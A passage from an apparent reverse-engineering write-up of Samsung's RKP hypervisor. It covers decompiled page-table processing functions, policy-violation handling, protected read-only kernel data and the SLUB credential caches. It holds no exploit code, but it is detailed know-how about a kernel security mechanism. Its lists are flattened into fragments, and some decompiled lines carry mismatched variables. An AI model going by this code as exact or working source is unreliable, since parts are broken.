uh_log('L', "rkp_l1pgt.c", 63, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 1);
rkp_phys_map_unlock(pgd);
return res;
}
} else {
if (!is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
res = rkp_phys_map_set(pgd, FREE);
if (res < 0) {
rkp_phys_map_unlock(pgd);
return res;
}
res = rkp_s2_page_change_permission(pgd, 0, 1, 0);
if (res < 0) {
uh_log('L', "rkp_l1pgt.c", 80, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 0);
rkp_phys_map_unlock(pgd);
return res;
}
}
offset = 0;
entry = 0;
start_addr = high_bits << 39;
do {
desc_p = pgd + entry;
desc = *desc_p;
if ((desc & 3) != 3) {
if (desc)
set_pxn_bit_of_desc(desc_p, 1);
} else {
addr = start_addr & 0xFFFFFF803FFFFFFF | offset;
res += rkp_l2pgt_process_table(desc & 0xFFFFFFFFF000, addr, is_alloc);
if (!(start_addr >> 39))
set_pxn_bit_of_desc(desc_p, 1);
}
entry += 8;
offset += 0x40000000;
start_addr = addr;
} while (entry != 0x1000);
rkp_phys_map_unlock(pgd);
return res;
}
rkp_l1pgt_process_table
does the following:
TTBR1_EL1
);tramp_pg_dir
or swapper_pg_dir
;TTBR0_EL1
);idmap_pg_dir
, it returns early.rkp_l2pgt_process_table
on them;Processing of the second level tables in done by the rkp_l2pgt_process_table
function.
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
// ...
if (!(start_addr >> 39)) {
if (!pmd_allocated_by_rkp) {
if (page_allocator_is_allocated(pmd) == 1)
pmd_allocated_by_rkp = 1;
else
pmd_allocated_by_rkp = -1;
}
if (pmd_allocated_by_rkp == -1)
return 0;
}
rkp_phys_map_lock(pmd);
if (is_alloc) {
if (is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pmd);
return 0;
}
if (start_addr >> 39)
type = KERNEL | L2;
else
type = L2;
res = rkp_phys_map_set(pmd, (start_addr >> 23) & 0xFF80 | type);
if (res < 0) {
rkp_phys_map_unlock(pmd);
return res;
}
res = rkp_s2_page_change_permission(pmd, 0x80, 0, 0);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 98, "Process l2t failed, %lx, %d", pmd, 1);
rkp_phys_map_unlock(pmd);
return res;
}
} else {
if (!is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
if (table_addr >= 0xFFFFFF8000000000)
rkp_policy_violation("Never allow free kernel page table %lx", pmd);
if (is_phys_map_kernel(pmd))
rkp_policy_violation("Entry must not point to kernel page table %lx", pmd);
res = rkp_phys_map_set(pmd, FREE);
if (res < 0) {
rkp_phys_map_unlock(pgd);
return 0;
}
res = rkp_s2_page_change_permission(pmd, 0, 1, 0);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 123, "Process l2t failed, %lx, %d", pmd, 0);
rkp_phys_map_unlock(pgd);
return 0;
}
}
offset = 0;
for (i = 0; i != 0x1000; i += 8) {
addr = offset | start_addr & 0xFFFFFFFFC01FFFFF;
res += check_single_l2e(pmd + i, addr, is_alloc);
offset += 0x200000;
}
rkp_phys_map_unlock(pgd);
return res;
}
rkp_l2pgt_process_table
does the following:
pmd_allocated_by_rkp
is 0 (default value);pmd_allocated_by_rkp
to -1.pmd_allocated_by_rkp
is -1, return early;check_single_l2e
on them.int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
// ...
if (executable_regions_contains(start_addr, 2)) {
if (!is_alloc) {
uh_log('L', "rkp_l2pgt.c", 36, "RKP_61acb13b %lx, %lx", desc_p, *desc_p);
uh_log('L', "rkp_l2pgt.c", 37, "RKP_4083e222 %lx, %d, %d", start_addr, (start_addr >> 30) & 0x1FF,
(start_addr >> 21) & 0x1FF);
rkp_policy_violation("RKP_d60f7274");
}
protect = 1;
} else {
set_pxn_bit_of_desc(desc_p, 2);
protect = 0;
}
desc = *desc_p;
type = *desc & 3;
if (type == 1)
return 0;
if (type != 3) {
if (desc)
uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
return 0;
}
if (protect)
uh_log('L', "rkp_l2pgt.c", 56, "L3 table to be protected, %lx, %d, %d", desc, (start_addr >> 21) & 0x1FF,
(start_addr >> 30) & 0x1FF);
if (!is_alloc && start_addr >= 0xFFFFFF8000000000) {
uh_log('L', "rkp_l2pgt.c", 58, "l2 table FREE-1 %lx, %d, %d", *desc_p, (start_addr >> 30) & 0x1FF,
(start_addr >> 21) & 0x1FF);
uh_log('L', "rkp_l2pgt.c", 59, "l2 table FREE-2 %lx, %d, %d", desc_p, 0x1FFFFFF, 0);
}
return rkp_l3pgt_process_table(*desc_p & 0xFFFFFFFFF000, start_addr, is_alloc, protect);
}
check_single_l2e
does the following:
executable_regions
memlist;protect
flag to 1.protect
to 0;rkp_l3pgt_process_table
.Processing of the third level tables in done by the rkp_l3pgt_process_table
function.
int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
// ...
cs_enter(&l3pgt_lock);
if (!stext_ptep && ((TEXT ^ start_addr) & 0x7FFFE00000) == 0) {
stext_ptep = pte + 8 * ((TEXT >> 12) & 0x1FF);
uh_log('L', "rkp_l3pgt.c", 74, "set stext ptep %lx", stext_ptep);
}
cs_exit(&l3pgt_lock);
if (!protect)
return 0;
rkp_phys_map_lock(pte);
if (is_alloc) {
if (is_phys_map_l3(pte)) {
uh_log('L', "rkp_l3pgt.c", 87, "Process l3t SKIP %lx, %d, %d", pte, 1, start_addr >> 39);
rkp_phys_map_unlock(pte);
return 0;
}
if (start_addr >> 39)
type = KERNEL | L3;
else
type = L3;
res = rkp_phys_map_set(pte, type);
if (res < 0) {
rkp_phys_map_unlock(pte);
return res;
}
res = rkp_s2_page_change_permission(pte, 0x80, 0, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 102, "Process l3t failed %lx, %d", pte, 1);
rkp_phys_map_unlock(pte);
return res;
}
offset = 0;
desc_p = pte;
do {
addr = offset | start_addr & 0xFFFFFFFFFFE00FFF;
if (addr >> 39) {
desc = *desc_p;
if (desc) {
if ((desc & 3) != 3)
rkp_policy_violation("Invalid l3e, %lx, %lx, %d", desc, desc_p, 1);
if (!executable_regions_contains(addr, 3))
set_pxn_bit_of_desc(desc_p, 3);
}
} else {
uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1FF,
(addr >> 21) & 0x1FF);
}
offset += 0x1000;
++desc_p;
} while (offset != 0x200000);
} else {
if (!is_phys_map_l3(pte)) {
uh_log('L', "rkp_l3pgt.c", 110, "Process l3t SKIP, %lx, %d, %d", pte, 0, start_addr >> 39);
rkp_phys_map_unlock(pte);
return 0;
}
res = rkp_phys_map_set(pte, FREE);
if (res < 0) {
rkp_phys_map_unlock(pte);
return res;
}
rkp_policy_violation("Free l3t not allowed, %lx, %d, %d", pte, 0, start_addr >> 39);
res = rkp_s2_page_change_permission(pte, 0, 1, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 127, "Process l3t failed, %lx, %d", pte, 0);
rkp_phys_map_unlock(pte);
return res;
}
offset = 0;
desc_p = pte;
do {
addr = offset | start_addr & 0xFFFFFFFFFFE00FFF;
if (addr >> 39) {
desc = *desc_p;
if (desc) {
if ((desc & 3) != 3)
rkp_policy_violation("Invalid l3e, %lx, %lx, %d", *desc, desc_p, 0);
if (executable_regions_contains(addr, 3))
rkp_policy_violation("RKP_b5438cb1");
}
} else {
uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1FF,
(addr >> 21) & 0x1FF);
}
offset += 0x1000;
++desc_p;
} while (offset != 0x200000);
}
rkp_phys_map_unlock(pte);
return 0;
}
rkp_l3pgt_process_table
does the following:
stext_ptep
(text section start page table entry pointer?) if this PTE and the kernel text have the same PGD/PUD/PMD index, so if this table span over the kernel text;protect
flag is 0, return early, otherwise continue;If the page table processing functions find something they consider a policy violation, they call the rkp_policy_violation
with a string describing the violation as the first argument.
int64_t rkp_policy_violation(const char* message, ...) {
// ...
res = rkp_log(0x4C, "rkp.c", 108, message, /* variable arguments */);
if (rkp_panic_on_violation)
uh_panic();
return res;
}
rkp_policy_violation
calls rkp_log
and then uh_panic
if rkp_panic_on_violation
is enabled (it is by default). rkp_log
is a wrapper around uh_log
that adds the current time and CPU number to the message, and also calls bigdata_store_rkp_string
to copy the message to the analytics region.
To get a better idea of what the overall state of RKP internal structures and hypervisor-controlled page tables looks like after startup is finished, let's go over each of them and what they contain.
dynamic_regions
uh_init
init_cmd_add_dynamic_region
init_cmd_initialize_dynamic_heap
protected_ranges
pa_restrict_init
pa_restrict_init
physmap
added in init_cmd_initialize_dynamic_heap
page_allocator.list
init_cmd_initialize_dynamic_heap
init_cmd_initialize_dynamic_heap
executable_regions
rkp_start
TEXT
-ETEXT
added in rkp_start
TRAMP_VALIAS
page added in rkp_start
dynamic_load_ins
)dynamic_load_rm
)dynamic_load_regions
rkp_start
dynamic_load_add_dynlist
)dynamic_load_rm_dynlist
)physmap
(based on dynamic_regions
)init_cmd_initialize_dynamic_heap
TEXT
-ETEXT
set as TEXT
in rkp_paging_init
TTBR0_EL1
) set as L1
in rkp_l1pgt_process_table
TTBR0_EL1
) set as L2
in rkp_l2pgt_process_table
TTBR0_EL1
) set as L3
where VA in executable_regions
in rkp_l3pgt_process_table
swapper|tramp_pg_dir
) set as KERNEL|L1
in rkp_l1pgt_process_table
swapper|tramp_pg_dir
) set as KERNEL|L2
in rkp_l2pgt_process_table
swapper|tramp_pg_dir
) set as KERNEL|L3
where VA in executable_regions
in rkp_l3pgt_process_table
rkp_lxpgt_process_table
)set_range_to_pxn|rox_l3
)rkp_set_pages_ro
, rkp_ro_free_pages
)ro_bitmap
(based on dynamic_regions
)init_cmd_initialize_dynamic_heap
ETEXT
-ERODATA
set as 1
in rkp_set_kernel_rox
rkp_s2_page_change_permission
)rkp_s2_range_change_permission
)dbl_bitmap
(based on dynamic_regions
)init_cmd_initialize_dynamic_heap
rkp_set_map_bitmap
)robuf
/page_allocator.map
(based on dynamic_regions
)init_cmd_initialize_dynamic_heap
page_allocator_alloc_page
)page_allocator_free_page
)memory_init
uh_init_bigdata
init_cmd_initialize_dynamic_heap
TEXT
-ETEXT
mapped RO in rkp_paging_init
swapper_pg_dir
page mapped RW in rkp_paging_init
init_cmd_initialize_dynamic_heap
init_cmd_initialize_dynamic_heap
rkp_paging_init
empty_zero_page
page mapped as RWX in rkp_paging_init
TEXT
-ERODATA
mapped as RWX in rkp_set_kernel_rox
(from rkp_paging_init
)rkp_paging_init
rkp_paging_init
TTBR0_EL1
) mapped as RO in rkp_l1pgt_process_table
TTBR0_EL1
) mapped as RO in rkp_l2pgt_process_table
executable_regions
in check_single_l2e
TTBR0_EL1
) mapped as RO where VA in executable_regions
in rkp_l3pgt_process_table
TEXT
-ERODATA
mapped as ROX in rkp_set_kernel_rox
(from rkp_deferred_start
)swapper|tramp_pg_dir
) mapped as RO in rkp_l1pgt_process_table
swapper|tramp_pg_dir
) mapped as RO in rkp_l2pgt_process_table
executable_regions
in check_single_l2e
swapper|tramp_pg_dir
) mapped as RO where VA in executable_regions
in rkp_l3pgt_process_table
executable_regions
We have seen in the previous sections how RKP manages to take full control of the kernel page tables. We will now see how this is used to protect critical kernel data by allocating it on read-only pages.
All the global variables that need to be protected by RKP are annoted with __rkp_ro
or __kdp_ro
in the kernel sources. That are moved to a section .rkp_ro
which is part of the .rodata
section of the kernel.
// from include/asm-generic/vmlinux.lds.h
#define RO_DATA_SECTION(align)
// ...
.rkp_ro : AT(ADDR(.rkp_ro) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start_rkp_ro) = .; \
*(.rkp_ro) \
VMLINUX_SYMBOL(__stop_rkp_ro) = .; \
VMLINUX_SYMBOL(__start_kdp_ro) = .; \
*(.kdp_ro) \
VMLINUX_SYMBOL(__stop_kdp_ro) = .; \
VMLINUX_SYMBOL(__start_rkp_ro_pgt) = .; \
RKP_RO_PGT \
VMLINUX_SYMBOL(__stop_rkp_ro_pgt) = .; \
} \
// from include/linux/linkage.h
#ifdef CONFIG_UH_RKP
#define __page_aligned_rkp_bss __section(.rkp_bss.page_aligned) __aligned(PAGE_SIZE)
#define __rkp_ro __section(.rkp_ro)
// ...
#endif
#ifdef CONFIG_RKP_KDP
#define __kdp_ro __section(.kdp_ro)
#define __lsm_ro_after_init_kdp __section(.kdp_ro)
// ...
#endif
// from arch/arm64/mm/mmu.c
unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)] __page_aligned_rkp_bss;
// ...
static pte_t bm_pte[PTRS_PER_PTE] __page_aligned_rkp_bss;
static pmd_t bm_pmd[PTRS_PER_PMD] __page_aligned_rkp_bss __maybe_unused;
static pud_t bm_pud[PTRS_PER_PUD] __page_aligned_rkp_bss __maybe_unused;
// from fs/namespace.c
struct super_block *rootfs_sb __kdp_ro = NULL;
struct super_block *sys_sb __kdp_ro = NULL;
struct super_block *odm_sb __kdp_ro = NULL;
struct super_block *vendor_sb __kdp_ro = NULL;
struct super_block *art_sb __kdp_ro = NULL;
// from init/main.c
int is_recovery __kdp_ro = 0;
// ...
rkp_init_t rkp_init_data __rkp_ro = { /* ... */ };
sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;
// ...
int __check_verifiedboot __kdp_ro = 0;
// ...
extern int ss_initialized __kdp_ro;
// from kernel/cred.c
int rkp_cred_enable __kdp_ro = 0;
// ...
struct cred init_cred __kdp_ro = { /* ... */ };
// from security/selinux/hooks.c
struct task_security_struct init_sec __kdp_ro;
// ...
//int selinux_enforcing __kdp_ro;
// ...
int selinux_enabled __kdp_ro = 1;
// ...
static struct security_hook_list selinux_hooks[] __lsm_ro_after_init_kdp = { /* ... */ };
// from security/selinux/ss/services.c
int ss_initialized __kdp_ro;
In addition to protecting global variables, RKP also protects 3 caches of the SLUB allocator by using for those read-only pages returned by RKP instead of pages returned by the page allocator. The 3 caches are:
cred_jar_ro
used for allocating struct cred
;tsec_jar
used for allocating struct task_security_struct
;vfsmnt_cache
used for allocating struct vfsmount
.// from include/linux/rkp.h
#define CRED_JAR_RO "cred_jar_ro"
#define TSEC_JAR "tsec_jar"
#define VFSMNT_JAR "vfsmnt_cache"
typedef struct ns_param {
u32 ns_buff_size;
u32 ns_size;
u32 bp_offset;
u32 sb_offset;
u32 flag_offset;
u32 data_offset;
}ns_param_t;
#define rkp_ns_fill_params(nsparam,buff_size,size,bp,sb,flag,data) \
do { \
nsparam.ns_buff_size = (u64)buff_size; \
nsparam.ns_size = (u64)size; \
nsparam.bp_offset = (u64)bp; \
nsparam.sb_offset = (u64)sb; \
nsparam.flag_offset = (u64)flag; \
nsparam.data_offset = (u64)data; \
} while(0)
static inline void dmap_prot(u64 addr,u64 order,u64 val)
{
if(rkp_cred_enable)
uh_call(UH_APP_RKP, RKP_KDP_X4A, order, val, 0, 0);
}
static inline void *rkp_ro_alloc(void){
u64 addr = (u64)uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_ALLOC, 0);
if(!addr)
return 0;
return (void *)__phys_to_virt(addr);
}
static inline void rkp_ro_free(void *free_addr){
uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_FREE, (u64)free_addr);
}
// from mm/slub.c
static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
// ...
if (rkp_cred_enable && s->name &&
(!strcmp(s->name, CRED_JAR_RO)|| !strcmp(s->name, TSEC_JAR) ||
!strcmp(s->name, VFSMNT_JAR))) {
uh_call(UH_APP_RKP, RKP_KDP_X44, (u64)object, (u64)s->offset,
(u64)freelist_ptr(s, fp, freeptr_addr), 0);
}
// ...
}
static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
// ...
if (s->name &&
(!strcmp(s->name, CRED_JAR_RO) ||
!strcmp(s->name, TSEC_JAR)||
!strcmp(s->name, VFSMNT_JAR))) {
virt_page = rkp_ro_alloc();
if(!virt_page)
goto def_alloc;
page = virt_to_page(virt_page);
oo = s->min;
} else {
// ...
/*
* We modify the following so that slab alloc for protected data
* types are allocated from our own pool.
*/
if (s->name) {
u64 sc,va_page;
va_page = (u64)__va(page_to_phys(page));
if(!strcmp(s->name, CRED_JAR_RO)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X50, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
if(!strcmp(s->name, TSEC_JAR)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X4E, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
if(!strcmp(s->name, VFSMNT_JAR)){
for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X4F, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
}
}
// ...
dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),1);
// ...
}
static void free_ro_pages(struct kmem_cache *s,struct page *page, int order)
{
unsigned long flags;
unsigned long long sc,va_page;
sc = 0;
va_page = (unsigned long long)__va(page_to_phys(page));
if(is_rkp_ro_page(va_page)){
for(sc = 0; sc < (1 << order); sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
rkp_ro_free((void *)va_page);
va_page += PAGE_SIZE;
}
return;
}
spin_lock_irqsave(&ro_pages_lock,flags);
for(sc = 0; sc < (1 << order); sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
memcg_uncharge_slab(page, order, s);
__free_pages(page, order);
spin_unlock_irqrestore(&ro_pages_lock,flags);
}
static void __free_slab(struct kmem_cache *s, struct page *page)
{
// ...
dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),0);
// ...
/* We free the protected pages here. */
if (s->name && (!strcmp(s->name, CRED_JAR_RO) ||
!strcmp(s->name, TSEC_JAR) ||
!strcmp(s->name, VFSMNT_JAR))){
free_ro_pages(s,page, order);
return;
}
// ...
}
// from kernel/cred.c
void __init cred_init(void)
{
/* allocate a slab in which we can store credentials */
cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred), 0,
SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, NULL);
#ifdef CONFIG_RKP_KDP
if(rkp_cred_enable) {
cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, cred_ctor);
if(!cred_jar_ro) {
panic("Unable to create RO Cred cache\n");
}
tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, sec_ctor);
if(!tsec_jar) {
panic("Unable to create RO security cache\n");
}
usecnt_jar = kmem_cache_create("usecnt_jar", sizeof(atomic_t) + sizeof(struct ro_rcu_head),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, usecnt_ctor);
if(!usecnt_jar) {
panic("Unable to create use count jar\n");
}
uh_call(UH_APP_RKP, RKP_KDP_X42, (u64)cred_jar_ro->size, (u64)tsec_jar->size, 0, 0);
}
#endif /* CONFIG_RKP_KDP */
}
// from fs/namespace.c
void __init mnt_init(void)
{
// ...
vfsmnt_cache = kmem_cache_create("vfsmnt_cache", sizeof(struct vfsmount),
0, SLAB_HWCACHE_ALIGN | SLAB_PANIC, cred_ctor_vfsmount);
if(!vfsmnt_cache)
panic("Failed to allocate vfsmnt_cache \n");
rkp_ns_fill_params(nsparam,vfsmnt_cache->size,sizeof(struct vfsmount),(u64)offsetof(struct vfsmount,bp_mount),
(u64)offsetof(struct vfsmount,mnt_sb),(u64)offsetof(struct vfsmount,mnt_flags),
(u64)offsetof(struct vfsmount,data));
uh_call(UH_APP_RKP, RKP_KDP_X41, (u64)&nsparam, 0, 0, 0);
// ...
}
// from fs/dcache.c
void __init vfs_caches_init(void)
{
// ...
mnt_init();
// ...
}
// from init/main.c
asmlinkage __visible void __init start_kernel(void)
{
// ...
if (rkp_cred_enable)
kdp_init();
cred_init();
// ...
vfs_caches_init();
// ...
}
Let's summarize which commands are used by the SLUB allocator:
Command | Function | Description |
---|---|---|
RKP_RKP_ROBUFFER_ALLOC |
rkp_cmd_rkp_robuffer_alloc |
Allocate a read-only page |
RKP_RKP_ROBUFFER_FREE |
rkp_cmd_rkp_robuffer_free |
Free a read-only page |
RKP_KDP_X50 |
rkp_cmd_set_pages_ro_cred_jar |
Mark a slab of cred_jar |
RKP_KDP_X4E |
rkp_cmd_set_pages_ro_tsec_jar |
Mark a slab of tsec_jar |
RKP_KDP_X4F |
rkp_cmd_set_pages_ro_vfsmnt_jar |
Mark a slab of vfsmnt_jar |
RKP_KDP_X48 |
rkp_cmd_ro_free_pages |
Unmark a slab |
RKP_KDP_X42 |
rkp_cmd_assign_cred_size |
Inform of the cred objects size |
RKP_KDP_X41 |
rkp_cmd_assign_ns_size |
Inform of the ns objects size |
RKP_KDP_X44 |
rkp_cmd_cred_set_fp |
Set the freelist pointer inside an object |
RKP_KDP_X4A |
rkp_cmd_prot_dble_map |
Prevent double mapping |
int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
// ...
page = page_allocator_alloc_page();
ret_p = regs->x2;
if ((ret_p & 1) != 0) {
if (ha1 != 0 || ha2 != 0)
rkp_policy_violation("Setting ha1 or ha2 should be done once");
ret_p &= 0xFFFFFFFFFFFFFFFE;
ha1 = page;
ha2 = page + 8;
}
if (ret_p) {
if (!page)
uh_log('L', "rkp.c", 270, "RKP_8f7b0e12");
*virt_to_phys_el1(ret_p) = page;
}
regs->x0 = page;
return 0;
}
rkp_cmd_rkp_robuffer_alloc
simply allocates a page from the page allocator (which uses the "robuf" region that we have seen earlier). The ha1
/ha2
stuff is only used by the RKP test module.
int64_t rkp_cmd_rkp_robuffer_free(saved_regs_t* regs) {
// ...
if (!regs->x2)
uh_log('D', "rkp.c", 286, "Robuffer Free wrong address");
page = rkp_get_pa(regs->x2);
page_allocator_free_page(page);
return 0;
}
rkp_cmd_rkp_robuffer_alloc
simply frees the page back to the page allocator.
rkp_cmd_set_pages_ro_cred_jar
, rkp_cmd_set_pages_ro_tsec_jar
and rkp_cmd_set_pages_ro_tsec_jar
call rkp_set_pages_ro
with a different type.
uint8_t* rkp_set_pages_ro(saved_regs_t* regs, int64_t type) {
// ...
if ((regs->x2 & 0xFFF) != 0)
return uh_log('L', "rkp_kdp.c", 803, "Page not aligned in set_page_ro %lx", regs->x2);
page = rkp_get_pa(regs->x2);
rkp_phys_map_lock(page);
if (rkp_s2_page_change_permission(page, 0x80, 0, 0) == -1) {
uh_log('L', "rkp_kdp.c", 813, "Cred: Unable to set permission %lx %lx %lx", regs->x2, page, 0);
} else {
memset(page, 0xFF, 0x1000);
switch (type) {
case 0:
type = CRED;
break;
case 1:
type = SEC_PTR;
break;
case 2:
type = NS;
break;
}
rkp_phys_map_set(page, type);
return rkp_phys_map_unlock(page);
}
return rkp_phys_map_unlock(page);
}
rkp_set_pages_ro
does the following:
rkp_get_pa
;rkp_s2_page_change_permission
;CRED
, SEC_PTR
or NS
in the physmap.rkp_cmd_ro_free_pages
calls rkp_ro_free_pages
.
uint8_t* rkp_ro_free_pages(saved_regs_t* regs) {
// ...
if ((regs->x2 & 0xFFF) != 0)
return uh_log('L', "rkp_kdp.c", 843, "Page not aligned in set_page_ro %lx", regs->x2);
page = rkp_get_pa(regs->x2);
rkp_phys_map_lock(page);
if (!is_phys_map_cred(page) && !is_phys_map_ns(page) && !is_phys_map_sec_ptr(page)) {
uh_log('L', "rkp_kdp.c", 854, "rkp_ro_free_pages : physmap_entry_invalid %lx %lx ", regs->x2, page);
return rkp_phys_map_unlock(page);
}
if (rkp_s2_page_change_permission(page, 0, 1, 0) < 0) {
uh_log('L', "rkp_kdp.c", 862, "rkp_ro_free_pages: Unable to set permission %lx %lx %lx", regs->x2, page);
return rkp_phys_map_unlock(page);
}
memset(page, 0, 0x1000);
rkp_phys_map_set(page, FREE);
return rkp_phys_map_unlock(page);
}
rkp_cmd_ro_free_pages
does the following:
rkp_get_pa
;CRED
, SEC_PTR
, or NS
in the physmap;rkp_s2_page_change_permission
;FREE
in the physmap.int64_t rkp_cmd_assign_cred_size(saved_regs_t* regs) {
rkp_assign_cred_size(regs);
return 0;
}
rkp_cmd_assign_cred_size
calls rkp_assign_cred_size
.
int64_t rkp_assign_cred_size(saved_regs_t* regs) {
// ...
cred_jar_size = regs->x2;
rkp_cred->CRED_BUFF_SIZE = cred_jar_size;
tsec_jar_size = regs->x3;
rkp_cred->SP_BUFF_SIZE = tsec_jar_size;
return uh_log('L', "rkp_kdp.c", 1033, "BUFF SIZE %lx %lx %lx", cred_jar_size, tsec_jar_size, 0);
}
rkp_assign_cred_size
does the following;
struct cred
in CRED_BUFF_SIZE
;struct task_security_struct
in SP_BUFF_SIZE
.int64_t rkp_cmd_assign_ns_size(saved_regs_t* regs) {
rkp_assign_ns_size(regs);
return 0;
}
rkp_cmd_assign_ns_size
calls rkp_assign_ns_size
.
int64_t rkp_assign_ns_size(saved_regs_t* regs) {
// ...
if (!rkp_cred)
return uh_log('W', "rkp_kdp.c", 1041, "RKP_ae6cae81");
nsparam_user = rkp_get_pa(regs->x2);
if (!nsparam_user)
return uh_log('L', "rkp_kdp.c", 1048, "NULL Data: rkp assign_ns_size");
memcpy(&nsparam, nsparam_user, sizeof(nsparam));
ns_buff_size = nsparam.ns_buff_size;
ns_size = nsparam.ns_size;
rkp_cred->NS_BUFF_SIZE = ns_buff_size;
rkp_cred->NS_SIZE = ns_size;
if (nsparam.bp_offset > ns_size)
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
sb_offset = nsparam.sb_offset;
if (nsparam.sb_offset > ns_size)
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
flag_offset = nsparam.flag_offset;
if (nsparam.flag_offset > ns_size)
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
data_offset = nsparam.data_offset;
if (nsparam.data_offset > ns_size)
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
rkp_cred->BPMNT_VFSMNT_OFFSET = nsparam.bp_offset >> 3;
rkp_cred->SB_VFSMNT_OFFSET = sb_offset >> 3;
rkp_cred->FLAGS_VFSMNT_OFFSET = flag_offset >> 2;
rkp_cred->DATA_VFSMNT_OFFSET = data_offset >> 3;
uh_log('L', "rkp_kdp.c", 1070, "NS Protection Activated Buff_size = %lx ns size = %lx", ns_buff_size, ns_size);
return uh_log('L', "rkp_kdp.c", 1071, "NS %lx %lx %lx %lx", rkp_cred->BPMNT_VFSMNT_OFFSET, rkp_cred->SB_VFSMNT_OFFSET,
rkp_cred->FLAGS_VFSMNT_OFFSET, rkp_cred->DATA_VFSMNT_OFFSET);
}
rkp_assign_ns_size
does the following:
ns_param
;rkp_cmd_cred_set_fp
calls rkp_cred_set_fp
.
int64_t invalid_cred_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
if (!is_phys_map_cred(object_pa) ||
object_va && object_va == object_va / rkp_cred->CRED_BUFF_SIZE * rkp_cred->CRED_BUFF_SIZE &&
rkp_cred->CRED_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
int64_t invalid_sec_ptr_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
if (!is_phys_map_sec_ptr(object_pa) || object_va &&
object_va == object_va / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE &&
rkp_cred->SP_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
int64_t invalid_ns_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
if (!is_phys_map_ns(object_pa) || object_va &&
object_va == object_va / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE &&
rkp_cred->NS_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
void rkp_cred_set_fp(saved_regs_t* regs) {
// ...
object_pa = rkp_get_pa(regs->x2);
offset = regs->x3;
freelist_ptr = regs->x4;
rkp_phys_map_lock(object_pa);
if (!is_phys_map_cred(object_pa) && !is_phys_map_sec_ptr(object_pa) && !is_phys_map_ns(object_pa)) {
uh_log('L', "rkp_kdp.c", 242, "Neither Cred nor Secptr %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_cred = is_phys_map_cred(object_pa);
is_sec_ptr = is_phys_map_sec_ptr(object_pa);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
rkp_phys_map_unlock(object_pa);
}
rkp_phys_map_unlock(object_pa);
if (freelist_ptr) {
freelist_ptr_pa = rkp_get_pa(freelist_ptr);
rkp_phys_map_lock(freelist_ptr_pa);
if (!is_phys_map_cred(freelist_ptr_pa) && !is_phys_map_sec_ptr(freelist_ptr_pa) &&
